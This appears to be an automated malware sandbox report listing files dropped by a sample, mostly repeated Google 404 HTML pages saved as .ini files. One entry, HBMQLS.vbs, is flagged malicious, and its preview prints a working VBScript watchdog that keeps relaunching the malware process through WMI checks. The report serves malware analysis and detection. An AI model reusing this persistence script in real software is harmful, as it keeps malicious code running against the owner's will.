                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yVSE9EYMdAQc4co601ewag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\5AFxz1y.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.271656582148378
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Y+pAZewRDK4mW
                                                                                                                                      MD5:6E6B9218FFFE0432A50AE6A8556598D7
                                                                                                                                      SHA1:285042B145A8ED75A2791312B290826F9824CD49
                                                                                                                                      SHA-256:359FD4AD2110814AAB63F8316D04C2B33053383D20F2DD363A8531A3DB1D1685
                                                                                                                                      SHA-512:AB0C05428C61808DA3C60CD1329D7F5C1C5561CCC35E360BD174CD54549E10E7FE92310EE6F4B486BB87D8F5E95D7DC45EE678B495EDD0611B05CCA81E893369
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="o8Ah_ksQSu9V8UOMkdH46Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\6u2tFOa.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.266454790412181
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0PnL/SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+E+pAZewRDK4mW
                                                                                                                                      MD5:1C4B85443629453930580A142A5F3572
                                                                                                                                      SHA1:81D5F9DC41E8021933C1D7F5019F7A5D3C817364
                                                                                                                                      SHA-256:4636523B4E8B0C17B46E0B77217ED0FEF71077810530F5E372D494B848BC9FF8
                                                                                                                                      SHA-512:885CDF687BDB3A90CA7AD1A4F1B3A4F6211B169CFCFE8B149DFEBBA9BF9B30D6DF77BC44DD461C284978408A01687EE21D7A090BE9A61435ACFCAF9FBC231D80
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YoBq6b5RBBKaeWyy9NLuGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\9vyDdmt.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.268592928329608
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+04zDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+JX+pAZewRDK4mW
                                                                                                                                      MD5:9A665E367DA5CB572BE0753F6411383B
                                                                                                                                      SHA1:D6E9301AB0157FEA6410E48C62D543F1B9E02219
                                                                                                                                      SHA-256:C69805276169F11A7306CA1B893301B184E43D244077A50141684A04B7AE362D
                                                                                                                                      SHA-512:297C76DE56A7DA630310DFFF231001A757F2FDB4586AE8B5951B209D268B2CCA059A014F3BCF82BFE0ECAE50F00DFB765392B8B3C4BC550F6BCD74B3DC5DC806
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gOSVLX9eBTdYnF9tS92RCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\AxGkuWC.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.259329214978537
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+063SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+J3+pAZewRDK4mW
                                                                                                                                      MD5:4240554A539ABF2F5F57438A56A9CDD1
                                                                                                                                      SHA1:404408D9BAC2AA91B8AA4BCAAB950BFF60D49F03
                                                                                                                                      SHA-256:110FE53BA6EDD4F41A35544DA86BDF2E3CF93265AAF01C4EBE2D104936CE4D53
                                                                                                                                      SHA-512:9AC828BB9887E08D45FAEFDB1D1CE6FFB93860F26ED90A83D1A2BEAF684CCC878F98D5E79F2E80850A944F49291825C6398EB63ADAF131ABC17807EDCEC37C04
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IspZcspPMaMa3M2RT60v6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\BYSlZiC.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.257877041805281
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0glSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                                      MD5:EA0CB80D24F4B815C88C24239F77C8DE
                                                                                                                                      SHA1:269368106B1105B9B0A9F1BF042262F9496CB644
                                                                                                                                      SHA-256:05CF6BD80858C099D0DE14CA73B27F135BE34AE5196BEB322CE54DCCFE9BDEC1
                                                                                                                                      SHA-512:0E5407CBF24B2C73DA53378D8CE4C1A942F889553326FA54706B9ED31EC66C77EB03B6BB085C686032B9E8189C0E734D8385C95D5B97148663652D4566E9314E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="D4SB0YKKlwBdfmYdfdbifA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\EJnczPB.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.262803017833971
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0HkSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0k+pAZewRDK4mW
                                                                                                                                      MD5:3980DE18D7C4336319035F20EC9A1ACB
                                                                                                                                      SHA1:AA6D88FACEDD8F259CAE71FD2D8D493FE4E56BA6
                                                                                                                                      SHA-256:8E8ED2AB6CA3A757410F6C6B18E91B2D62D2F5C1FB1FBF3D3DBCB346A109BE7A
                                                                                                                                      SHA-512:3DC40AD0CFC995A631897380BF089D155589E0CF743FC56B1B302E0CBCAD0744AC3796041F2FA17CBCD9F545EEF2F55D0BA04D85A7B67B6864C6C7532C02BC00
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GCsIfmTYGtwYKm_EzneQwA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\G2bvjM4.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.2550302368069515
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0IH3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+NX+pAZewRDK4mW
                                                                                                                                      MD5:F52319A29B19E5B6104E19BBA4ACB1ED
                                                                                                                                      SHA1:8EF77A4BFA43FDD88A06C5E7591D55582E5881E5
                                                                                                                                      SHA-256:28AF3875321A24007F6F68CC808B586EAE13C20C41BA6D482F700E0B71AF0A10
                                                                                                                                      SHA-512:CFA194033227F29504E8E11B30D2A0B392BFFD218879305B1CFF38994D3D0642FC968BBB21107C60DF9662368C79094E1493898026821B032316B9F8C119ED80
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sCox9Ra3WxfuycYEluwImA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\G5hJM8Z.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.249958582557942
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0GbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3b+pAZewRDK4mW
                                                                                                                                      MD5:568D319740F16FCAB7A46C7CFCECCF26
                                                                                                                                      SHA1:E46607280FFE1D908D9D6215B2308173B2F02B19
                                                                                                                                      SHA-256:820B4E63876E7D5247A50DCD8BC28B0235FB83127D2B376A3C945020546C2E25
                                                                                                                                      SHA-512:F677E1703FD8FF3901E3CDB9DEA3FF273E76EBE65E6064E76A8E40A5CC64464EB4E33C029EFA52C25CCD50C11C0A538B6B2D3C198E0C2CF6EDC8952F1F8DB7C8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gkCocxcubAUQVhaAoriJjg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\G78vawo.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.261521476266031
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0F+DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8u+pAZewRDK4mW
                                                                                                                                      MD5:3C6E99033F64B4ADCCD8B1B9CC61CD53
                                                                                                                                      SHA1:F4301C09587E042FBE26F5EF8732E1F11ED82ADB
                                                                                                                                      SHA-256:B0ADEC8968C541BC4B039C80DDB912BBA84CA417B607B95A3A108E9B5331F8C4
                                                                                                                                      SHA-512:A9F49BEBB74B699F0C981FD6A723F15C2660D606DDF2B74A2A6CDDAFF2BC62F95B0465F21EA6B111C12C54C836BF52843F716E890417380F955D0D9D76439A65
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TxVItGu34K03NNOfBNocsw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\GdIQhwl.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.245178962521632
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0LSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                                                                      MD5:64D3A1EDF95367A58D995D3231C2E5F3
                                                                                                                                      SHA1:1EEC5F0AC838DF925B43D268719ECC880622563D
                                                                                                                                      SHA-256:351C57F82CB6743BC904FFC302E250B37BC60590778281EB218030986EEE71B6
                                                                                                                                      SHA-512:E4D97A70DF40B17F60414795F610FA4E38DE4537BA7F685FEB3A5FA57B365FA27AE88965B6A4827C1A2DB2B90B776D53EA5452BC3BE5F5AFEF5E3DA2D81FD1D1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cdGkdnWQ28Z09hhrOn-lsg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\HBMQLS.vbs

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\._cache_222.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):832
                                                                                                                                      Entropy (8bit):5.348728510580844
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:dF/UFLvU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFLct+G+7xLxe0WABNVIqZaVzgA
                                                                                                                                      MD5:555A579CE96ED753C94B14ECDA6BF827
                                                                                                                                      SHA1:C8910EC131045EF1F11F29C7B5633F0B9B63AD27
                                                                                                                                      SHA-256:A714320EA2EDD0F177749D7F3276E402D9919EF089FC107861FF1E944D5F3521
                                                                                                                                      SHA-512:98327B1E87214E6ED2E360177FC48C6F479D349DF8FA2044ED8C5984FFF5C085794E3E1374F1FC9A2127A0298629FA937AA4EF2419B60F33827F4C799785F4F5
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_222.exe"..fileset = """C:\Users\user\Desktop\._cache_222.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

                                                                                                                                      C:\Users\user\AppData\Local\Temp\HZi5Ity.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.26683505113149
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0QSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D+pAZewRDK4mW
                                                                                                                                      MD5:E5CEEA2F0E7ED66F8214615A4E683A5F
                                                                                                                                      SHA1:2A36F20B585EBA10025E1867D9748F8EBA781E7E
                                                                                                                                      SHA-256:A24034A79F2ADBCE5DEBF8F499F206372BAAEE9FEB0CF89377A7196991294C74
                                                                                                                                      SHA-512:03F6AA52E778A8A3B8CFD3A9E2A813F98E172DBE6F9AF53F3DCB4D6156DC74FC38422A6A8070EEA6424FD5CE7393CF6DE44EAA1A4FC6EA2B2EE79FBC254E532B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WNk3zUV53hqTaEd2SO1-_A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\Hoi9cS6.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.2667632797029595
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0Z2SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+P+pAZewRDK4mW
                                                                                                                                      MD5:3ECAA20533C751B9E5266506A73ACF63
                                                                                                                                      SHA1:67E74BDFF21F7FAF52FD4B4DC6BBF6228A50689E
                                                                                                                                      SHA-256:BBC7E6A7C347B74172757918A4DC7359708929C14AA0637F8187C03FFB0D3C57
                                                                                                                                      SHA-512:D2B14A61E7BD434A6CFBFA410465FD674DD764B3A00316B2980F7E1E6E1165D21B3361A2ED4F1A140DA2017B90ECA9D0C1A65CFCF28B562F3E7D459BD8BE81AB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lDR_qBhTQrmm6R-fTBU5HA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\IDTl8AU.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.270224227686485
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0iSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+t+pAZewRDK4mW
                                                                                                                                      MD5:02AE306F0C782B158153316382D03E66
                                                                                                                                      SHA1:AC34EA7BA7192FA8343A96FA4DC11F4330869FE2
                                                                                                                                      SHA-256:95DBE92F03E75E37F4503C193644D1CB9FA334D40B970803D23838532A47B641
                                                                                                                                      SHA-512:401ED8C649C39599B3B8AAC70A4C969D0F39A00034EF326DA70B435D68F96E482C8958E4C63599CDB839B59BE44255E99D1B7A9C5D89CB6C37ADEB619BDB8D7C
                                                                                                                                      Malicious:false
